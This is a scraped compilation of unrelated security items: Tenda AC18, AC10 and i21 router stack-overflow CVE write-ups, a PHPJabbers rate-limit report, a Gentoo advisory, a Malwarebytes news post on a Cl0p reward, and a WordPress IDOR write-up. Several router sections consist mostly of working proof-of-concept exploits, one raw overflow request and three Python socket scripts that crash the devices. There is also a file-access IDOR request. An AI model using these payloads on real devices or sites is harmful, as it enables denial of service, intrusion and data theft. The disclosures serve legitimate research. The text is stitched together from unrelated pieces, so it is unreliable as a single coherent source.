Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the list parameter at /goform/SetStaticRouteCfg.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function SetStaticRouteCfg, the content obtained by the program from the list parameter is passed to v5, and then calls sub\_781E8 function, let's follow up and check

At this time, the position of a2 parameter in the corresponding function.

After that, a2 is assigned to v16, and then the matched content in v16 is directly formatted into the stack of v11, v10, v9 and s1 through the function sscanf through regular expression. There is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/SetStaticRouteCfg HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1758
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/static_route.html?random=0.8948303619841387&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6eodtcvb
    
    list=192.168.1.0,255.255.255.0,100.64.0.2,WAN1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

This PoC can result in a Dos.

CVE-2022-38310: NWPU_Projct/Tenda/AC18/6 at main · rickytriky/NWPU_Projct

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromSetIpMacBind.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetIpMacBind, The static\_list is controllable, it will assign the value to the list, and finally use strcpy to copy the list to mib\_buf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x1000
p2 \= b'list=' + p1

p3 \= b"POST /goform/SetIpMacBind" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42168: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/WifiWpsStart，The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42170: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/AddSysLogRule.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/AddSysLogRule, when the input op is add, you can input logip, logport, len, and finally these three will be spliced into mib\_value through sprintf. It is worth noting that these three do not check the size, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'op=add&logip=' + p1

p3 \= b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44362: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

PHPJabbers Appointment Scheduler version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/appointment-scheduler/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48840Descriptions:PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting.Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 426Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then Start Attack and check mail.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840)

PHPJabbers Appointment Scheduler 3.0 Missing Rate Limiting

Gentoo Linux Security Advisory 202401-21 - A vulnerability has been found in KTextEditor where local code can be executed without user interaction. Versions greater than or equal to 5.90.0-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: KTextEditor: Arbitrary Local Code Execution  
     Date: January 15, 2024  
     Bugs: #832447  
       ID: 202401-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in KTextEditor where local code can be  
executed without user interaction.

Background  
=========  
Framework providing a full text editor component for KDE.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  ------------  
kde-frameworks/ktexteditor  < 5.90.0-r2   >= 5.90.0-r2

Description  
==========  
A vulnerability has been discovered in KTextEditor. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
KTextEditor executes binaries without user interaction in a few cases,  
e.g. KTextEditor will try to check on external file modification via  
invoking the "git" binary if the file is known in the repository with  
the new content.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All KTextEditor users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=kde-frameworks/ktexteditor-5.90.0-r2"

References  
=========  
[ 1 ] CVE-2022-23853  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23853

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-21

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-21

Categories: News
Categories: Ransomware
Tags: Cl0p

Tags:  ransomware

Tags:  RFJ

Tags:  10 million

Tags:  MOVEit

Rewards for Justice (RFJ) is offering a reward of up to $10 million for information the Cl0p ransomware gang is acting at the direction or under the control of a foreign government.



(Read more...)




The post US dangles $10 million reward for information about Cl0p ransomware gang appeared first on Malwarebytes Labs.

The US Department of State’s national security rewards program, Rewards for Justice (RFJ), is offering a reward of up to $10 million for information linking the Cl0p ransomware gang, or any other malicious cyber actors targeting US critical infrastructure, to a foreign government.

> — Rewards for Justice (@RFJ\_USA) June 16, 2023

This is not really new. RFJ’s statutory authorities offers rewards for information in four broad categories and one of them is:

**Malicious Cyber Activity** For information that identifies or locates any individual who, while acting at the direction or under the control of a foreign government, aids or abets a violation of the Computer Fraud and Abuse Act  (“CFAA”), 18 U.S.C. § 1030. This includes foreign election interference.

But the Tweet explicitly mentioning Cl0p is new. The gang is thought to be behind a recent ransomware spree that compromised a large number of organizations by exploiting a zero-day flaw in Progress’ MOVEit Transfer software.

With as many as 2,500 targets exposed on the Internet, the number of potential victims could be in the hundreds. Some of them have already confirmed, either by the firms themselves or by  being mentioned on the Cl0p leak site.

Campaigns like Cl0p's abuse of the MOVEit vulnerability, or high profile attacks like the one on Colonial Pipeline in 2021, can trigger an extra focus on the specific ransomware group responsible. Perhaps aware of this, Cl0p took to its website to preemptively promise that it was not going to use data stolen from government organizations and would delete it instead.

It seems that was not enough to avoid getting in the cross-hairs of the US federal government, as we predicted just hours before. The tweet appeared shortly after our own Cybersecurity Evangelist, Mark Stockley, expressed his doubts that Cl0p's plan would help them avoid unwanted attention from law enforcement.

> "Cl0p's approach supposes that the US government would react more strongly to sensitive data being leaked than it would to multiple simultaneous breaches by the same criminal organisation. This ignores the fact that by using zero-days to attack hundreds of targets simultaneously, including parts of the federal government, Cl0p has already made itself ransomware's squeakiest wheel."

And don’t think that all these ransomware operators sit safely out of reach, behind what used to be an iron curtain. The recent arrest of Ruslan Magomedovich Astamirov, a ransomware actor associated with LockBit, in Arizona, shows that the cybercriminals think they can hide anywhere if they are careful enough.

US Attorney Philip R. Sellinger for the District of New Jersey said:

> “Astamirov is the third defendant charged by this office in the LockBit global ransomware campaign, and the second defendant to be apprehended. The LockBit conspirators and any other ransomware perpetrators cannot hide behind imagined online anonymity. We will continue to work tirelessly with all our law enforcement partners to identify ransomware perpetrators and bring them to justice.”

Also, some criminals can’t help themselves and need to show off how rich they are or how clever they think they are. The best example may be Mark Sokolovsky. This Ukrainian national and alleged cybercriminal loved posting selfies with fistfuls of cash. When the Russian invasion of Ukraine caused him to flee the country, his girlfriend posted pictures of the couple’s journey on her Instagram account. Sokolovsky was arrested in the Netherlands and is awaiting extradition to the US, accused of being a key player in the cybercrime operation behind Raccoon Stealer.

So, if you're in the market for a $10 million reward, happy hunting. And for anyone eligible, I’m throwing in a free copy of Malwarebytes Premium. You’ll need it.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

US dangles $10 million reward for information about Cl0p ransomware gang

In Webbukkit Dynmap 3.0-beta-3 or below, due to a missing login check in servlet/MapStorageHandler.java, an attacker can see a map image without login even if victim enables login-required in setting.

CVE-2019-12395: Fix required login bypass vulnerability by Ry0taK · Pull Request #2475 · webbukkit/dynmap

The WordPress File Sharing Plugin WordPress plugin before 2.0.5 does not check authorization before displaying files and folders, allowing users to gain access to those filed by manipulating IDs which can easily be brute forced

When testing the plugin, the vulnerability **“Insecure direct object references (IDOR)”** was discovered, which allows you to view someone else’s folder through a specialized request to the server and download files of someone else without his consent, even if he did not share the file. **All users** and their files that they have ever downloaded are at risk. This vulnerability can be carried out from the user with the lowest privileges – **“Subscriber”**, if there is a page with the plugin’s shortcode on your site, or on behalf of the user **“Contributor”** to create a page with this plugin.

****Main info:****

CVE

CVE-2023-4836

Plugin

User Private Files – WordPress File Sharing Plugin

Critical

**Very High**

Publicly Published

October 9, 2023

Last Updated

October 9, 2023

Researcher

Dmtirii Ignatyev

OWASP TOP-10

A5: Broken Access Control

PoC

Yes

Exploit

Will be later

Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4836  
https://wpscan.com/vulnerability/c17f2534-d791-4fe3-b45b-875777585dc6

Plugin Security Certification by CleanTalk

****Timeline****

August 14, 2023

Plugin testing and vulnerability detection in the **User Private Files – WordPress File Sharing Plugin** plugin have been completed

August 14, 2023

I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing

September 26, 2023

The author has released a fix update

October 9, 2023

Registered **CVE-2023-4836**

****Discovery of the Vulnerability****

While conducting a comprehensive evaluation of the **User Private Files plugin**, a significant security vulnerability was identified – **“Insecure Direct Object References (IDOR).”** This vulnerability allows malicious actors to access someone else’s folders, download files without consent, and potentially expose sensitive data. Even users who have never shared their files are at risk. Remarkably, this security flaw can be exploited by users with minimal privileges, such as “**Subscribers**,” provided that a page with the plugin’s shortcode exists on the website or by “**Contributors**” when creating a page with the plugin.

****Understanding of IDOR attack’s****

**“Insecure Direct Object References (IDOR)”** is a security issue where an attacker can manipulate input and gain unauthorized access to data or resources. In the context of this vulnerability, attackers can craft specialized requests to the server **to access folders and download files belonging** to other users, even without explicit sharing permissions.

****Exploiting the IDOR****

Exploiting the **IDOR vulnerability** in the **User Private Files plugin** involves manipulating requests to access and download files from other users’ folders. Attackers, even with minimal privileges, can craft requests to bypass access controls and obtain sensitive files. This can be accomplished through targeted **URL manipulation** or by creating pages with the plugin and subsequently accessing files linked to those pages.

> **POC** **request**:
> 
> **_POST_** /wordpress/wp-admin/admin-ajax.php HTTP/1.1
> 
> Host: your\_site
> 
> User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
> 
> Accept: application/json, text/javascript, \*/\*; q=0.01
> 
> Accept-Language: en-US,en;q=0.5
> 
> Accept-Encoding: gzip, deflate
> 
> X-Requested-With: XMLHttpRequest
> 
> Content-Type: multipart/form-data; boundary=—————————9502138512374627775493398790
> 
> Content-Length: 427
> 
> Origin: http://your\_site
> 
> Connection: close
> 
> Referer: http://your\_site/wordpress/?p=353
> 
> Cookie: wordpress\_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1691948630%7C6nakHLX7V9a8tsLj73IR18n6O2i78yRcGA3zDOchEqj%7C42aa9939bd3f232972786fa53b21ec360ce77c3a4eeab81598e87bb459445128; thc\_time=1693728697; wp-settings-1=libraryContent%3Dbrowse%26siteorigin\_panels\_setting\_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress\_logged\_in\_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1691948630%7C6nakHLX7V9a8tsLj73IR18n6O2i78yRcGA3zDOchEqj%7Ce08aa71d0671f82a0540ae982432a502c621e3332be543dcf8daef2f78a255d3
> 
> Sec-Fetch-Dest: empty
> 
> Sec-Fetch-Mode: cors
> 
> Sec-Fetch-Site: same-origin
> 
> —————————–9502138512374627775493398790
> 
> Content-Disposition: form-data; name=”fldr\_id”
> 
> {here\_you\_can\_put\_your\_number\_from\_0\_to\_9999}
> 
> —————————–9502138512374627775493398790
> 
> Content-Disposition: form-data; name=”upf\_nonce”
> 
> 72b5f13e74
> 
> —————————–9502138512374627775493398790
> 
> Content-Disposition: form-data; name=”action”
> 
> upvf\_pro\_load\_flder
> 
> —————————–9502138512374627775493398790–

The risks associated with **CVE-2023-4836 are substantial**. An attacker who successfully exploits this vulnerability can:

*   Access sensitive files and data belonging to other users.
*   Download files without the owner’s consent, even if they were never shared.
*   Potentially expose confidential information.
*   Compromise the privacy and security of user data.

In a **real-world scenario**, imagine an attacker leveraging this vulnerability to access and download files from unsuspecting users on a website utilizing the **User Private Files plugin**. By manipulating URLs or creating pages with the plugin, the attacker can access files that were never meant to be shared or **accessed by unauthorized users**. This could lead to data breaches, privacy violations, and reputational damage to the website.

******Recommendations for Improved Security******

To mitigate the risks posed by **CVE-2023-4836** and enhance the overall security of websites using the User Private Files plugin, consider the following recommendations:

*   **Update the plugin:** Ensure the User Private Files plugin is updated to the latest version, which should include a patch to address this vulnerability.
*   **Access controls:** Implement robust access controls and authorization mechanisms to prevent unauthorized access to user files and data.
*   **Security testing:** Conduct thorough security testing and vulnerability assessments to identify and rectify IDOR vulnerabilities proactively.
*   **User awareness:** Educate website users about privacy and the importance of not sharing sensitive files through public pages or links.
*   **Least privilege principle:** Limit the capabilities and permissions of user roles to reduce the potential impact of a compromised account.

> By adhering to these recommendations, website administrators can significantly reduce the risk of **IDOR vulnerabilities** and enhance the overall security posture of their WordPress installations.
> 
> #WordPressSecurity #IDOR #WebsiteSafety #StayProtected #VeryHighVulnerability
> 
> **Use CleanTalk solutions to improve the security of your website**
> 
> DMITRII I.

CVE-2023-4836: CVE-2023-4836 - User Private Files - IDOR to Sensitive data and private files exposure / leak of info - POC - Use only certified WordPress plugins for your website

The MouseWheel Smooth Scroll WordPress plugin before 5.7 does not have CSRF check in place on its settings page, which could allow attackers to make a logged in admin change them via a CSRF attack

Search

lenovo warranty check/lookup | check warranty status | lenovo support us